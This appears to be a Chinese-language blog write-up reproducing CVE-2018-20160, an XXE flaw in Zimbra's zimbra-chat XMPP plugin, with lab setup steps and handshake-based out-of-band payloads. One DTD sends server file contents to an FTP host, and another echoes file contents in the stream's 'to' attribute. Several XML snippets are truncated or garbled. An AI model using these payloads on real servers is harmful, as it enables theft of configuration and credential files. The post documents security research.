周末没事,接着找CVE-2018-20160,XMPP的XXE
https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.9/P9
补丁上说XXE是zimbra-chat插件的漏洞,由于zimbra-chat插件是apt安装,所以如果管理员没事upgrade一下就修复了,而8.7.x的AutoDiscovers XXE是需要手工安装补丁的,相对会多一些。
顺便一说:其它XMPP协议估计搞法估计都差不多,大佬们有空可以多试试^_^
还是使用jorgedlcruz/zimbra这个docker作为基础,该docker使用8.7.11版本的安装包,所以需要进行一点修改。
使用start.sh的内容创建配置,但是安装使用该地址的安装包:
https://files.zimbra.com/downloads/8.8.9_GA/zcs-8.8.9_GA_3019.UBUNTU16_64.20180809160254.tgz
解压缩后需要删除包中utils/globals.sh,删除其中的zimbra-patch行,否则安装时会安装更新。
调用install.sh安装时,不能使用8.7.11的输入重定向。
由于zimbra-chat是apt安装,会自动安装最新版,所以最后还得给zimbra-chat插件降个级:
apt-get install zimbra-chat=2.0.1.1532356008-1.u16
su - zimbra
zmmailboxdctl restart
新旧代码对比:
新:
旧:
先看了半天Zimbra-chat代码,发现看解析流程实在太费劲了就改看XMPP协议了。
代码位置在/opt/zimbra/lib/openchat下面,有兴趣的师傅可以多跟跟。
具体连接流程可以下载一个Gajim,看其中的XML控制台。
说下个人理解:XMPP的协议基于XML,相当于C/S两端拼凑XML,你写一段我写一段,解析过程使用流式XML解析。但是具体的DOCTYPE定义、实体引用是XML发起人所规定。(emm,这段不确定对,仅供参考。)由于大部分操作都得走认证,没有账号的情况下除了首次握手以外也没啥好搞的了,下面说的都是基于首次握手做的。
流式XML解析的接口:
http://doc.codingdict.com/java_api/javax/xml/stream/XMLStreamReader.html
连接XMPP服务
openssl s_client -connect 192.168.252.139:5222 -starttls xmpp --debug
dtd:
% send SYSTEM 'ftp://192.168.252.1/%payload;'>">
%param1;
发送报文(第一次握手报文):
%remote;
%send;
]>
<stream:stream xmlns="jabber:client" version="1.0" xmlns:stream="http://etherx.jabber.org/streams" to="zimbra.io" xml:lang="zh" >
结果只有一行:
如果读localconfig.xml直接抛异常,就是原文作者说的ftp命令中的换行被java检测的问题。
emm,作者原文里提到了新版本的Java会抛掉多行命令,但是并不影响提到的几个CVE= =,这个节奏不对啊?
继续翻XMPP协议
经过查询,发现除了client to server这样的请求,还有server to server的:
https://xmpp.org/extensions/xep-0288.html
dtd:
<!ENTITY % param1 " internal '%payload;'>">
走握手包,如果to的服务不存在,会将to的内容回显,也是在属性中:
%remote;
%param1;
]>
<stream:stream xmlns:stream='http://etherx.jabber.org/streams'
xmlns='jabber:server' xmlns:db='jabber:server:dialback'
to='&internal;' from='zimbra.io'
xml:lang='en' version='1.0'>
由于上面的操作走了XML的属性,所以是没法读带<和&(实体定义除外)文件的(比如localconfig.xml之类的)。
接着由于starttls操作的握手还没搞明白,所以登录以后的利用还没有搞。
但是看Gajim的数据流,starttls以后的stream还是由C端发起,可以设置Doctype,然后通过message发消息来读取XML文件(这个可以在Tag中),这个就请各位师傅自行研究了(板凳西瓜准备)。
https://www.cnblogs.com/backlion/p/9302528.html
https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
https://staaldraad.github.io/2016/12/11/xxeftp/
https://gist.github.com/staaldraad/280f167f5cb49a80b4a3